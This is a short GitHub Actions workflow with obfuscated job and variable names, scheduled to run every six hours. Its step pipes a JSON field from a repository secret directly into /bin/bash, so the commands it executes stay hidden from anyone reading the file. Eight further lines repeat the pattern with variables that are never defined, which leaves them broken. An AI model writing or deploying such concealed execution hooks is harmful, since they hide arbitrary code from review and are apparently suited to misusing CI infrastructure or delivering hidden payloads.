name: xiaomuzhi5678
on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaomuzhi5678
        env:
          ojru568: ${{ secrets.ojru568 }}
        run: |
          echo $ojru568 | jq -r .kai75911 | /bin/bash
          echo $nbbc791 | jq -r .v5649 | /bin/bash
          echo $txcw87592 | jq -r .mbjf3 | /bin/bash
          echo $gxe8064 | jq -r .mnf18389 | /bin/bash
          echo $aia527 | jq -r .dnzys78 | /bin/bash
          echo $aqno249 | jq -r .yyc18 | /bin/bash
          echo $y6516 | jq -r .ip45186 | /bin/bash
          echo $vk196 | jq -r .ih9587 | /bin/bash
          echo $koaxl3 | jq -r .izgsj642 | /bin/bash

